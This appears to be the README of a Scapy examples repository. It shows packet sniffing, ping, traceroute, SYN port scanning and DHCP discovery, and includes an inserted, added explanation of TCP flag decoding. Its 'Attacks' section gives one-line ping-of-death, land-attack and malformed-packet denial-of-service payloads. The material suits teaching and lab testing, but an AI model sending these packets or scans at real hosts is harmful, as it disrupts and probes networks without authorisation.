uberscapy

Scapy docs, examples, scripts and other stuff

WARNING: NOT ALL SCRIPTS ARE TESTED! CHECK BEFORE RUNNING!

Contents

docs - different Scapy docs
examples - examples for official Scapy usage and more

Tutorial

The official Scapy usage tutorial is located here.

Simple examples

Sniff

Sniffing on eth0:

    sniff(iface="eth0", prn=lambda x: x.summary())
    sniff(iface="eth0", prn=lambda x: x.show())

Formatted sniff output:

    pkts = sniff(prn=lambda x:x.sprintf("{IP:%IP.src% -> %IP.dst%\n}{Raw:%Raw.load%\n}"))

Identify ports

    a=sniff(filter="tcp and ( port 25 or port 110 )", \
    prn=lambda x: x.sprintf("%IP.src%:%TCP.sport% -> %IP.dst%:%TCP.dport%  %2s,TCP.flags% : %TCP.payload%"))

Ping

TCP ping (looping with srloop):

	srloop(IP(dst="www.google.com/30")/TCP())

TCP ping:

    ans,unans = sr( IP(dst="192.168.1.*")/TCP(dport=80,flags="S") )
    # summary() passes the (sent, received) pair to the callback; the Python 2 "lambda (s,r)" form is not valid on Python 3
    ans.summary( lambda s,r : r.sprintf("%IP.src% contesta") )

UDP ping

    ans,unans = sr( IP(dst="192.168.1.1-10")/UDP(dport=0) )
    ans.summary( lambda s,r : r.sprintf("%IP.src% contesta en udp") )

ARP ping manual:

    ans,unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst="192.168.1.0/24"),timeout=2)
    ans.summary(lambda s,r: r.sprintf("%Ether.src% %ARP.psrc%") )

ARP ping built in:

	arping("192.168.1.1")

Traceroute:

	traceroute(["www.google.com","www.ust.cl","www.terra.cl","www.microsoft.com"],maxttl=20)
	result, unans=_
	result.show()
	# save output
	result.graph(type="ps", target="|lp")
	result.graph(target="> grafico.svg")

Advanced traceroute + DNS:

    ans,unans = sr(IP(dst="terra.cl",ttl=(1,10))/TCP(dport=53,flags="S"))
    ans.summary( lambda s,r : r.sprintf("%IP.src%\t{ICMP:%ICMP.type%}\t{TCP:%TCP.flags%}"))

Dump traceroute output:

	res,unans = traceroute(["www.ust.cl","www.santotomas.cl"],dport=[80,443],maxttl=20,retry=-2)
	res.graph(type="ps", target="|lp")
	res.graph(target="> grafico.svg")

Port scanner:

    res,unans = sr( IP(dst="target")/TCP(flags="S", dport=(1,1024)) )
    # keep only TCP replies with the SYN bit (0x02) set, i.e. SYN/ACK answers
    res.nsummary( lfilter=lambda s,r: (r.haslayer(TCP) and (r.getlayer(TCP).flags & 2)) )
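The scanner above keeps replies whose TCP flags have bit 0x02 (SYN) set and prints them with `%TCP.flags%`, but it does not say what the other flag combinations mean. The following is an added example, not code from uberscapy or from Scapy: it decodes the flags bitmask into the same letters Scapy prints and classifies the reply to a SYN probe as open (SYN/ACK), closed (RST) or filtered (no reply). The function names, `SAMPLE_REPLIES` and the addresses are my own constructed assumptions; the logic runs offline, and the Scapy-backed check at the end only runs when Scapy is installed.

```python
# Added example (not part of uberscapy): interpret the TCP flag values that
# the port scanner filters with "flags & 2".

# bit value -> letter, in the order Scapy renders them for %TCP.flags%
TCP_FLAG_BITS = {
    0x01: "F", 0x02: "S", 0x04: "R", 0x08: "P",
    0x10: "A", 0x20: "U", 0x40: "E", 0x80: "C",
}


def decode_tcp_flags(flags: int) -> str:
    """Render a TCP flags bitmask as Scapy-style letters, e.g. 0x12 -> 'SA'."""
    return "".join(letter for bit, letter in sorted(TCP_FLAG_BITS.items())
                   if flags & bit)


def classify_syn_reply(flags):
    """Classify the reply to a SYN probe. flags is the TCP flags int, or
    None when sr() got no answer for that port (it lands in 'unans')."""
    if flags is None:
        return "filtered"          # no reply: dropped by a firewall or host
    if flags & 0x02 and flags & 0x10:
        return "open"              # SYN/ACK: a listener accepted the SYN
    if flags & 0x04:
        return "closed"            # RST (usually RST/ACK): nothing listening
    return "unexpected"            # anything else deserves a look by hand


def summarize_scan(replies):
    """replies: {port: flags int or None}. Returns {port: state}."""
    return {port: classify_syn_reply(f) for port, f in sorted(replies.items())}


# Constructed sample of what sr() might have returned for three probed ports
SAMPLE_REPLIES = {22: 0x12, 23: 0x14, 80: None}

if __name__ == "__main__":
    for port, state in summarize_scan(SAMPLE_REPLIES).items():
        f = SAMPLE_REPLIES[port]
        shown = decode_tcp_flags(f) if f is not None else "-"
        print(f"{port:5d} {shown:4s} {state}")
    try:
        from scapy.all import IP, TCP   # optional: same logic on a Scapy packet
    except ImportError:
        print("scapy not installed; skipping the packet-object check")
    else:
        pkt = IP(src="192.0.2.1") / TCP(sport=22, dport=40000, flags="SA")
        print(pkt.sprintf("%IP.src%:%TCP.sport% %TCP.flags%"),
              classify_syn_reply(int(pkt[TCP].flags)))
```

Ports that answered nothing are in `unans`, not `res`, so a real run has to feed those in as `None` to get the "filtered" verdict; the page's `nsummary` filter silently drops them.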

OS fingerprint:

	ans,unans = srloop(IP(dst="192.168.1.1")/TCP(dport=80,flags="S"))

Attacks

Malformed packets:

    send(IP(dst="192.168.1.1", ihl=2, version=3)/ICMP())

Ping of death:

    send( fragment(IP(dst="192.168.1.1")/ICMP()/("X"*60000)) )

Land attack (Windows):

    send(IP(src=target,dst=target)/TCP(sport=135,dport=135))

DHCP discovery:

	conf.checkIPaddr = False
	fam,hw = get_if_raw_hwaddr(conf.iface)
	dhcp_discover = Ether(dst="ff:ff:ff:ff:ff:ff")/IP(src="0.0.0.0",dst="255.255.255.255")/UDP(sport=68,dport=67)/BOOTP(chaddr=hw)/DHCP(options=[("message-type","discover"),"end"])
	ans, unans = srp(dhcp_discover, multi=True)
	ans.display()

Links

http://stackoverflow.com/questions/10818661/scapy-retrieving-rssi-from-wifi-packets

http://hackoftheday.securitytube.net/2013/04/wi-fi-ssid-sniffer-in-12-lines-of.html

http://hackoftheday.securitytube.net/2013/03/wi-fi-sniffer-in-10-lines-of-python.html

http://scholarworks.sjsu.edu/cgi/viewcontent.cgi?article=1191&context=etd_projects

http://pen-testing.sans.org/blog/2011/10/13/special-request-wireless-client-sniffing-with-scapy

http://raidersec.blogspot.com/2013/01/wireless-deauth-attack-using-aireplay.html

http://www.secdev.org/projects/scapy/portability.html